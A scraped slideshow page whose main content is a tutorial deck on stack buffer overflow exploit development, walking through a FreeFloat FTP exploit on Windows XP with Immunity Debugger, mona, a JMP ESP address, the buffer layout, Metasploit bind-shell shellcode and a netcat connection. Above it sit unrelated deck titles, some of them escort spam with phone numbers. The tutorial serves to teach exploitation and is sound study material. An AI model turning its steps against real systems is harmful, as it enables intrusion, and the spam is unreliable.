The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 

Dive into exploit development with Immunity Debugger, Mona.py and Metasploit

  • 1. Dive into exploit development Mohsen Ahmadi
  • 2. Disclaimer If you’re someone that wants to build exploits to partake in illegal or immoral activity, please go elsewhere
  • 3. Introduction to Exploit Development Explore some basic ideas behind exploits How we can execute our shellcodes Each part contains a technique of how to successfully exploit a program in wild We’ll cover every thing from SRP to ROP
  • 4. Preparing our laboratory in Virtual Machine Immunity Debugger Mona.py Pvefindaddr.py Metasploit Framework Virtualization Software
  • 5. Immunity Debugger (cont) powerful new way to write exploits, analyze malware, and reverse engineer binary files Immunity Debugger is similar to Ollydbg but it has python support Cuts exploit development time by 50% Connectivity to fuzzers and exploit development tools http://debugger.immunityinc.com/ID_register.py
  • 6. Features Remote command bar Python Scripting Built in Graphing Immunity Debugger is light Immunity Debugger exposes the information you need
  • 11. Immunity Debugger exposes the information you need
  • 12. Mona.py(cont)  Mona.py is plug-in for Immunity Debugger which is developed by Corelan Team  Mona also requires a small amount of configuration before you can start using it  human error rates are high when dealing with binary and hex  Mona can scan data for patterns much faster and more accurately than we can  Mona can even build ROP structures
  • 13. SET OF Commands SUPPORTED BY MONA
  • 14. Mona lisa We’ll talk about how to configure and work with Mona in later slides!
  • 15. Pvefindaddr.py Well in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need whenbuilding an exploit
  • 16. Metasploit Framework Generating our desired shellcodes Escaping bad characters by msfencode Receiving any connection back to our computer Try to use Kali linux which fulfills you needs
  • 18. X86 CPU registers(cont)  EAX - Main register used in arithmetic calculations. Also known as accumulator, as it holds results of arithmetic operations and function return values.  EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of the program.  ECX - The Counter register is often used to hold a value representing the number of times a process is to be repeated. Used for loop and string operations.  EDX - A general purpose registers. Also used for I/O operations. Helps extend EAX to 64-bits.  ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used as an offset address in string and array operations. It holds the address from where to read data.
  • 19. X86 CPU registers  EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of the current stack frame. It is used to reference local variables.  ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is used to reference local variables.  EIP - Instruction Pointer (holds the address of the next instruction to be executed)  EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by the ES register. Used as an offset address in string and array operations. It holds the implied write address of all string operations.
  • 20. BOF Buffer overflow: a memory location receives more data than it was meant to Stack overflow: usually a Buffer Overflow that writes over Stack segment beyond the end of the stack
  • 21. Look for?!! our buffer needs to overwrite EIP one of the CPU registers needs to contain our buffer
  • 22. How does it work? 1) We get an overly string to our program 2) this string overwrites EIP and part of it is stored in a CPU register 3) we find a pointer that points to the register that contains our buffer 4) we put that pointer in the correct place in our buffer so it overwrites EIP 5) when the program reaches our pointer it executes the instruction and jumps to the register that contains our buffer Finally we place our shellcode in the part of the buffer that is stored in the CPU register!
  • 23. First scenario  Exploit Development: Kali Linux  Debugging Machine: Windows XP PRO SP3  Vulnerable Software: FreeFloat FTP  Write simple BOF exploit from scratch
  • 24. Direct EIP overwrie  Exploit Development: Kali Linux  Debugging Machine: Windows XP PRO SP3  Vulnerable Software: FreeFloat FTP  Write simple BOF exploit from scratch For first tutorial we’ll just rely on “x00x0Ax0D” bad characters
  • 25. Getting started with Immunity debugger  Starting the Debugger  Opening and Attaching to the debugging target application  CPU windows  Registers windows I’ll explain each part separately
  • 26. Starting the Debugger  Before starting, you need to ensure that you are using an account that has the appropriate privileges, generally local Administrator equivalent  “Run as administrator”
  • 27. Opening and Attaching to the debugging target application  By opening the target executable from disk using the File->Open menu option  By attaching to an already running program using the File->Attach menu option
  • 29. Attach to the target
  • 30. CPU windows  actual instructions of the program we are about to run  I will be referring to this as the CPU instruction or disassembler pane  Memory address  Opcode  X86 MASM syntax Alt+C
  • 31. Registers / flags window  These registers are small storage areas within the CPU itself, and they are used to facilitate various operations that are performed within the X86 assembly language
  • 34. Open program  First open FreeFloat FTP server  When service goes up check out for state of connections on your target machine
  • 36. Replicate the crash(cont)  create a POC skeleton exploit to crash the FTP server  FTP servers comes with built-in anonymous user account  MKD ~ make directory FTP port is 21
  • 37. POC!  Send your POC payload to server  Check EIP is overwritten with “x41” ?  Which registers contain part of our buffer ?  Try to find out which register contain more chunk of our data ? “x41” ~ “A”
  • 38. Registers EIP overwritten & EDI, ESP contains part of our buffer
  • 39. Metasploit pattern  We now need to determine the correct offset in order get code execution  pattern_create.rb  the script will generate a string composed of unique patterns that we can use to replace our sequence of 'A's Pay attention that you keep the original buffer length since a varying buffer length may change the program crash
  • 40. Again replicate your crash(cont)  Send your payload to FTP service and check for EIP value which Is overwritten by metasploit pattern
  • 41. Check EIP!  Find the offset which EIP is overwritten by our pattern  !Mona comes into place
  • 42. Configure !mona  Download Mona, copy it to PyCommands directory of Immunity Debugger  Use the following command to config mona  %p based on process name  %i based on process id
  • 43. Find cyclic pattern with !mona  !mona findmsp  From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after the initial 247-bytes of our buffer
  • 45. Check again  Now our buffer should be look like this:  Buffer=“A”*247+”B”*4+”C”*749  “B” ~ “x42”
  • 46. Replace “B”s with pointer to ESP  we can replace those B's with a pointer that redirects execution flow to ESP  keep in mind that our pointer can't contain any bad characters Do you remember bad characters? “x00x0Ax0D”
  • 47. JMP ESP  To find a valid pointer which redirect us to ESP we can use “mona” with the following command  !mona jmp –r esp
  • 48. Endian order of the X86 processor Big Endian (Others) Little Endian (Intel) Register Register Low Memory Addresses CE FA ED FE High Memory Addresses FE ED FA CE CEFAEDFE CEFAEDFE 0x0 0x1 0x2 0x3 00 00 00 000x4 0x5
  • 49. Msvcrt.dll (MS12-013)  Starting from Visual Studio 2003, any program that is dynamically linked to the C Run-Time library will use msvcrXX.dll instead of msvcrt.dll  If your program statically linked with this visual C run time library your program is safe  %windir%system32
  • 50. Our pointer to JMP ESP  0x77c35459 : push esp # ret [msvcrt.dll]  C:WINDOWSsystem32msvcrt.dll  Put a breakpoint on our pointer (F2)
  • 51. Put our Shellcode into buffer  Inserting our payload in the part of the buffer that is now made up of C's  we would like to have the buffer length modified dynamically  insert some NOP's (No Operation Performed = x90) before our payload as padding buffer = "A"*247 + "x59x54xC3x77" +”x90”*20+shellcode + "C"*(749-(len(shellcode)+20))
  • 52. Generate our Shellcode with msfpayload(cont)  Msfpayload –l | grep windows  Metasploit has a command-line shellcode generation function called msfpayload  To use msfpayload, you need to know the options associated with each payload Msfpayload -O
  • 54. Msfencode | bad character escaping  Encode your exploit to prevent broken shellcode
  • 55. Check netstat before & after POC!  If Our payload work without raising any error will spawn a shell for us on port 3320 :D let’s check it with NetCat
  • 56. Game over!  NC –nvv 192.168.149.153 3320  V: verbose mode  N: use IP only don’t resolve DNS Hopefully you now understand the basics of a stack- based buffer overflow
  • 57. OS DLL or application  If you choose an OS DLL, because they are not same in various versions of windows so your exploit isn't portable  These DLL’s are not randomized on XP but they are on Windows 7  If your application moves between operating system versions, you're still going to be referencing a JMP ESP within the application itself, and not be OS dependent